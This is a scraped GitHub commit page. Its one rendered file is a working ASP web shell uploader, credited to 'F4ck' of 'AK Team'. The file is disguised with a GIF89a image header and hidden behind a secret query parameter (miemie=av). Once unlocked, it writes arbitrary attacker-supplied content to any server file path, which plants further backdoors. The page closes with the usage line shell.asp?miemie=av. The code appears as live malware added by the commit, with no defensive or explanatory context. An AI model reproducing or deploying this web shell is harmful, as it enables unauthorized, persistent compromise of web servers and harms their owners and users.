-
Notifications
You must be signed in to change notification settings - Fork 199
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
66 changed files
with
55,269 additions
and
0 deletions.
There are no files selected for viewing
Large diffs are not rendered by default.
Oops, something went wrong.
Large diffs are not rendered by default.
Oops, something went wrong.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,44 @@ | ||
GIF89a$ ;<hTml> | ||
<% if request("miemie")="av" then %> | ||
<% | ||
on error resume next | ||
testfile=Request.form("2010") | ||
if Trim(request("2010"))<>"" then | ||
set fs=server.CreateObject("scripting.filesystemobject") | ||
set thisfile=fs.CreateTextFile(testfile,True) | ||
thisfile.Write(""&Request.form("1988") & "") | ||
if err =0 Then | ||
response.write"<font color=red>Success</font>" | ||
else | ||
response.write"<font color=red>False</font>" | ||
end if | ||
err.clear | ||
thisfile.close | ||
set fs = nothing | ||
End if | ||
%> | ||
<style type="text/css"> | ||
<!-- | ||
#Layer1 { | ||
position:absolute; | ||
left:500px; | ||
top:404px; | ||
width:118px; | ||
height:13px; | ||
z-index:7; | ||
} | ||
.STYLE1 {color: #9900FF} | ||
--> | ||
</style> | ||
<title>Welcome To AK Team</title> | ||
<form method="POST" ACTION=""> | ||
<input type="text" size="54" name="2010" | ||
value="<%=server.mappath("akt.asp")%>"> <BR> | ||
<TEXTAREA NAME="1988" ROWS="18" COLS="78"></TEXTAREA> | ||
<input type="submit" name="Send" value="GO!"> | ||
<div id="Layer1">- BY F4ck</div> | ||
</form> | ||
<% end if %> | ||
</hTml> | ||
shell.asp?miemie=av |
Large diffs are not rendered by default.
Oops, something went wrong.
Large diffs are not rendered by default.
Oops, something went wrong.
Oops, something went wrong.